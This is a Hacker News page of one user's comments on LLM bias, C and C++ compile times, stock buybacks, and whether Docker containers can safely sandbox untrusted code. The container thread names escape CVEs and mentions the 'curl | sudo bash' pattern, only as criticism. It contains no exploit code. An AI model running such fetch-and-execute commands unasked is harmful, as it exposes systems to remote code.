Hacker Newsnew | past | comments | ask | show | jobs | submit | petters's commentslogin

I think that bias is not due to the proportion of books and more due to how they are fine-tuned after the pretraining.

We identify the real number 2 with the rational number 2 with the integer 2 with the natural number 2. It does not seem so strange to also identify the complex number 2 with those.

If you say "this function f operates on the integers", you can't turn around and then go "ooh but it has solutions in the rationals!" No it doesn't, it doesn't exist in that space.

You can't do this for general functions, but it's fine to do in cases where the definition of f naturally embeds into the rationals. For example, a polynomial over Z is also a polynomial over Q or C.

> C++ doesn't take longer to compile if you don't abuse templates.

Surprisingly, this is not true. I've written a C++ file only to realize at the end that I did not use any C++ features. Renaming the file to .c halved the compilation time.


I don't believe you, I measured compile times in c compilers and my own. If you provide more information I'd be more likely to believe you

On some compiler toolchains (IIRC MSVC was the main offender) you get a lot more code pulled into your source file when including a C stdlib header (like <stdio.h>) in C++ mode versus C mode. Basically a couple hundred lines in C mode versus thousands of lines in C++ mode.

That's fair. I'm unable to provide more information though so we'll have to disagree.

[flagged]


I agree it shouldn't really matter if there's no C++ features in play, but I suppose third party headers could bite you if they use #ifdef __cplusplus to guard optional C++ extensions on top of their basic C interface. In that case the compiler could be dealing with dramatically more complex code when you build in C++ mode.

Maybe it is similar for the same compiler (but one should check, I suspect C could still be faster), but then there are much more C compilers. For example, TCC is a lot faster than GCC.

The question is the performance optimisations on top.

1990's compilers were also super fast, they only did optimisation for size, speed, constant propagation, and little else.

Zero code motion, loop unroling, code elision, heap via stack replacement, inlining,...


Of course, but gcc with -O0 is still slower and there is no TCC for C++.

There are other C++ compilers to benchmark against, using the same common C subset for comparison, though.

Is there still any non-LLVM C++ compiler left besides GCC? LLVM is not exactly known for its speed.

Many embedded vendors still haven't made the jump, and Microsoft.

MSVC?

tcc is 8x faster, twice as fast isn't doing it justice.

As for the header thing, that'd could potentially be true if the compile time was something like 450ms -> 220ms, but why bother saying it when you're only saving a few hundred milliseconds


Going from 220 to 450 ms would be a disaster in my project. It has many thousands of files. Recompilation of almost everything happens from time to time.

If those made-up numbers were true, they would be very significant and an argument in favor of keeping the code in C


A 200ms difference is adding or removing 200lines lines of implementation, and spliting it up into a file can make it slower because of include overhead. You completely made up C being twice as fast as C++.

> We build Claude with Claude.

Yes and it shows. Gemini CLI often hangs and enters infinite loops. I bet the engineers at Google use something else internally.


How could they be? Claude was down

This makes no sense. Buybacks and dividends are how companies give money to investors


> This makes no sense. Buybacks and dividends are how companies give money to investors

Dividends are totally fine (from my perspective), while. buybacks are problematic from a place where executives are bonused on share price and earnings per share, both of which can be manipulated by buybacks.

More philosophically, I think that dividends are better for society as they allow investors to realise a stream of value from well run companies rather than needing to sell their share to acquire this value.

This is obviously just my opinion though, I don't know if it matches to what the OP cares about.


> Dividends are totally fine (from my perspective)

FWIW, companies are now opting for buybacks because it is more "tax efficient".

Stockholders have to pay taxes on dividends (immediately) but only pay capital gains on share price increases and only when they sell.


Yeah I know, I just think that's a poor use of tax policy. The only case where buybacks make sense to me is for companies that give employees RSUs, in which case buybacks compensate for the dilution.


Notionally there's not a difference between dividends and buybacks. (That's somebody's theorem... Modigliani maybe?) The fact that our tax laws treat them so differently doesn't make much sense.


Dividends in effect force you to sell while buybacks redistribute to people who want to sell/realize it. They are also more efficient tax wise.

The only good reason to pay out dividends instead of announcing buybacks is a view that your shares are overpriced. Then you can't buy them back without facing a potential lawsuit (you are making a company buy something you know is overvalued).


Why does it matter if people have to sell their shares to unlock value? Is it just the friction of small orders?

Buybacks for manipulating share prices and earnings per share are indeed silly. But they should also be trivial to compensate for by normalising on market cap instead of a single share.


And the answer to the obvious follow-up question is...?


Milk before cereals


Milk, then cereal, then bowl!


How about a bowl, and then, 30 minutes ~ 1 hour later, milk with cereals?


Maybe it's under NDA :)


42


fries


imbue

Would be great to see this work continued with some training runs


Agreed. But these things have a way of not working out, and one the sadness, one forgets to celebrate the intermediate victories. I wanted to share an intermediate victory before reality crushes the joy.


> But what if you're an environmentally conscious mother who needs to drive the 5 minute walk to your kids' school? Surely, a modern car must be less polluting?

> CO2 emissions/km:

No, you have already compared fuel consumption. This is equivalent.


> Older alternatives like sandbox-2 exist, but they provide isolation near the OS level, not the language level. At that point we might as well use Docker or VMs.

No,no, Docker is not a sandbox for untrusted code.


What if I told you that, back in the day, we were letting thousands of untrusted, unruly, mischievous people execute arbitrary code on the same machine, and somehow, the world didn't end?

We live in a bizarre world where somehow "you need a hypervisor to be secure" and "to install this random piece of software, run curl | sudo bash" can live next to each other and both be treated seriously.


9/10 times i see curl | sudo bash mentioned, its about it being bad so I don't think that's a good comparison.


It depends on your threat model, but generally speaking would not trust default container runtimes for a true sandbox.

The kata-containers [1] runtime takes a container and runs it as a virtual host. It works with Docker, podman, k8s, etc.

It's a way to get the convenience of a container, but benefits of a virtual host.

This is not do-all-end-all, (there are more options), but this is a convenient one that is better than typical containers.

[1] - https://katacontainers.io/


I don't think it is generally possible to escape from a docker container in default configuration (e.g. `docker run --rm -it alpine:3 sh`) if you have a reasonably update-to-date kernel from your distro. AFAIK a lot of kernel lpe use features like unprivileged user ns and io_uring which is not available in container by default, and truly unprivileged kernel lpe seems to be sufficient rare.


The kernel policy is that any distro that isn't using a rolling release kernel is unpatched and vulnerable, so "reasonably up-to-date" is going to lean heavily on what you consider "reasonable".

LPEs abound - unprivileged user ns was a whole gateway that was closed, io-uring was hot for a while, ebpf is another great target, and I'm sure more and more will be found every year as has been the case. Seccomp and unprivileged containers etc make a huge different to stomp out a lot of the attack surface, you can decide how comfortable you are with that though.


>The kernel policy is that any distro that isn't using a rolling release kernel is unpatched and vulnerable, so "reasonably up-to-date" is going to lean heavily on what you consider "reasonable".

I would expect major distributions to have embargoed CVE access specifically to prevent this issue.


Nope, that is not the case. For one thing, upstream doesn't issue CVEs and doesn't really care about CVEs or consider them valid. For another, they forbid or severely limit embargos.


You're right, Docker isn't a sandbox for untrusted code. I mentioned it because I've seen teams default to using it for isolating their agents on larger servers. So I made sure to clarify in the article that it's not secure for that purpose.


It depends on the task, and the risk of isolation failure. Docker can be sufficient if inputs are from trusted sources and network egress is reasonably limited.


Show me how you will escape a docker sandbox.


This is a well understood and well documented subject. Do your own research.

Start here to help give you ideas for what to research:

https://linuxsecurity.com/features/what-is-a-container-escap...


This kind of response isn't helpful. He's right to ask about the motivations for the claim that containers in general are "not a sandbox" when the design of containers/namespaces/etc. looks like it should support using these things to make a sandbox. He's right to be confused!

If you look at the interface contract, both containers and VMs ought to be about equally secure! Nobody is an idiot for reading about the two concepts and arriving at this conclusion.

What you should have written is something about your belief that the inter-container, intra-kernel attacker surface is larger than the intra-hypervisor, inter-kernel attack surface and so it's less likely that someone will screw up implementing a hypervisor so as to open a security hole. I wouldn't agree with this position, but it would at least be defensible.

Instead, you pulled out the tired old "education yourself" trope. You compounded the error with the weasely "are considered" passive-voice construction that lets you present the superior security of VMs as a law of nature instead of your personal opinion.

In general, there's a lot of alpha in questioning supposedly established "facts" presented this way.


> This is a well understood and well documented subject. Do your own research.

Anything including GNU/Linux kernel can be broken with such security vulnerabilities.

This is not a weakness in the design of containers. `npm install`, on the other hand, is broken by design (due to post-install.


> This is not a weakness in the design of containers.

Partially correct.

Many container escapes are also because the security of the underlying host, container runtime, or container itself was poorly or inconsistently implemented. This creates gaps that allow escapes from the container. There is a much larger potential for mistakes, creating a much larger attack surface. This is in addition to kernel vulnerabilities.

While you can implement effective hardening across all the layers, the potential for misconfiguration is still there, therefore there is still a large attack surface.

While a virtual host can be escaped from, the attack surface is much smaller, leaving less room for potential escapes.

This is why containers are considered riskier for a sandbox than a virtual host. Which one you use, and why, really should depend on your use case and threat model.

Sad to say it, a disappointing amount of people don't put much hardening into their container environments, including production k8s clusters. So it's much easier to say that a virtual host is better for sandboxing than containers, because many people are less likely to get it wrong.


> Many container escapes are also because the security of the underlying host, container runtime, or container itself was poorly or inconsistently implemented.

Sure, so running `npm install` inside the container is no worse than `npm install` on my machine. And in most cases, it is much better.


Containers are more isolation than without. That was never in debate in our conversation.


Escaping a properly set up container is a kernel 0day. Due to how large the kernel attack surface is, such 0days are generally believed to exist. Unless you are a high value target, a container sandbox will likely be sufficient for your needs. If cloud service providers discounted this possibility then a 0day could be burned to attack them at scale.

Also, you can use the runsc (gvisor) runtime for docker, if you are careful not to expose vulnerable protocols to the container there will be nothing escaping it with that runtime.


You start with the assumption of "properly set up container". Also I believe you are oversimplifying the attack surface.

A container escape can be caused by combinations of breakdowns in several layers:

- Kernel implementation - aka, a bug. It's rare, but it happens

- Kernel compile time options selected - This has become more rare, but it can happen

- Host OS misconfiguration - Can be a contributing factor to enabling escapes

- Container runtime vulnerability - A vulnerability in the runtime itself

- Container runtime misconfiguration - Was the runtime configured properly?

- Individual container runtime misconfiguration - Was the individual container configured to run securely?

- Individual Container build - what's in the container, and can be leveraged to attack the host

- Running container attack surface - What's the running container's attack surface

The last two are included to be complete, but in the case of the original article running untrusted python code makes them irrelevant in this circumstance.

My point you must consider the system as a whole to consider its overall attack surface and risk of compromise. There is a lot more that can go wrong to enable a container escape than you implied.

There are some people who are knowledgeable enough to ensure their containers are hardened at every level of the attack surface. Even then, how many are diligent enough to ensure that attention to detail every time? how many automate their configurations?

Most default configurations are not hardened as a compromise to enable usability. Most people who build containers do not consider hardening every possible attack surface. Many don't even know the basics. Most companies don't do a good job hardening their shared container environments - often as a compromise to be "faster".

So yeah, a properly set up container is hard to escape.

Not all containers are set up properly - I'd argue most are not.


> Escaping a properly set up container is a kernel 0day.

Not it is not. In fact many of the container escapes we see are because of bugs in the container runtimes themselves which can be quite different in their various implementations. CVE-2025-31133 was published 2? months ago and had nothing at all do with the kernel - just like many container escapes don't.


If a runtime is vulnerable then it didn't "set up a container properly".

Containers are a kernel technology for isolating and restricting resources for a process and its descendants. Once set up correctly, any escape is a kernel 0day.

For anyone who wants to understand what a container is I would recommend bubblewrap: https://github.com/containers/bubblewrap This is also what flatpak happens to use.

It should not take long to realize that you can set it up in ways that are secure and ways which allow the process inside to reach out in undesired ways. As runtimes go, it's as simple as it gets.


Note CVE-2025-31133 requires one of: (1) persistent container (2) attacker-controlled image. That means that as long as you always use "docker run" on known images (as opposed to "docker start"), you cannot be exploited via that bug even if the service itself is compromised.

I am not saying that you should never update the OS, but a lot of of those container escapes have severe restrictions and may not apply to your specific config.


Note this lists 3 vulnerabilities as an example: CVE-2016-5195 (Dirty COW), CVE-2019-5736 (host runc override) and CVE-2022-0185 (io_uring escape)

Out of those, only first one is actually exploitable in common setups.

CVE-2019-5736 requires either attacker-controlled image or "docker exec". This is not likely to be the case in the "untrusted python" use case, nor in many docker setups.

CVE-2022-0185 is blocked by seccomp filter in default installs, so as long as you don't give your containers --privileged flags, you are OK. (And if you do give this flag, the escape is trivial without any vulnerabilities)


The burden of proof lies with the person making empirically unfalsifiable claims.


Exploit the Linux kernel underneath it (not the only way, just the obvious one). Docker is a security boundary but it is not suitable for "I'm running arbitrary code".

That is to say, Docker is typically a security win because you get things like seccomp and user/DAC isolation "for free". That's great. That's a win. Typically exploitation requires a way to get execution in the environment plus a privilege escalation. The combination of those two things may be considered sufficient.

It is not sufficient for "I'm explicitly giving an attacker execution rights in this environment" because you remove the cost of "get execution in the environment" and the full burden is on the kernel, which is not very expensive to exploit.


> Exploit the Linux kernel underneath it (not the only way, just the obvious one). Docker is a security boundary but it is not suitable for "I'm running arbitrary code".

Dockler is better for running arbitrary code compared to the direct `npm install <random-package>` that's common these days.

I moved to a Dockerized sandbox[1], and I feel much better now against such malicious packages.

  1 - https://github.com/ashishb/amazing-sandbox


It's better than nothing, obviously. But I don't consider `npm install <random-package>` to be equivalent to "RCE as a service", although it's somewhat close. I definitely wouldn't recommend `npm install <actually a random package>`, even in Docker.

I also implemented `insanitybit/cargo-sandbox` using Docker but that doesn't mean I think `insanitybit/cargo-sandbox` is a sufficient barrier to arbitrary code execution, which is why I also had a hardened `cargo add` that looked for typosquatting of package names, and why I think package manager security in general needs to be improved.

You can and should feel better about running commands like that in a container, as I said - seccomp and DAC are security boundaries. I wouldn't say "you should feel good enough to run an open SSH server and publish it for anyone to use".


> `npm install <random-package>` to be equivalent to "RCE as a service"

It is literally that. When you write "npm install foo", npm will proceed to install the package called "foo" and then run its installation scripts. It's as if you'd run curl | bash. That npm install script can do literally anything your shell in your terminal can do.

It's not "somewhat close" to RCE. It is literally, exactly, fully, completely RCE delivered as a god damn service to which you connect over the internet.


I'm familiar with how build scripts work. As mentioned, I build insanitybit/cargo-sandbox exactly to deal with malicious build scripts.

The reason I consider it different from "I'm opening SSH to the public, anyone can run a shell" is because the attack typically has to either be through a random package, which significantly reduces exposure, or through a compromised package, which requires an additional attack. Basically, somewhere along the way, something else had to go wrong if `npm install <x>` gives an attacker code execution, whereas "I'm giving a shell to the public" involves nothing else going wrong.

Running a command yourself that may include code you don't expect is not, to me, the same as arbitrary code execution. It often implies it but I don't consider those to be identical.

You can disagree with whether or not this meaningfully changes things (I don't feel strongly about it), but then I'd just point to "I don't think it's a sufficient barrier for either threat model but it's still an improvement".

That isn't to downplay the situation at all. Once again,

> that doesn't mean I think `insanitybit/cargo-sandbox` is a sufficient barrier to arbitrary code execution, which is why I also had a hardened `cargo add` that looked for typosquatting of package names, and why I think package manager security in general needs to be improved.


> definitely wouldn't recommend `npm install <actually a random package>`, even in Docker.

That's not the main attack vector. The attack vector is some random dependency that is used by a lot of popular packages, which you `npm install` indirectly.


That doesn't change what I said. It definitely doesn't change what I said about docker as a security boundary.

Again, it's great to run `npm` in a container. I do that too because it's the lowest effort solution I have available.


Docker provides some host isolation which can be used effectively as a sandbox. It's not designed for security (and it does have some reasonable defaults) but it does give you options to layer on security modules like apparmor and seccomp very easily.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: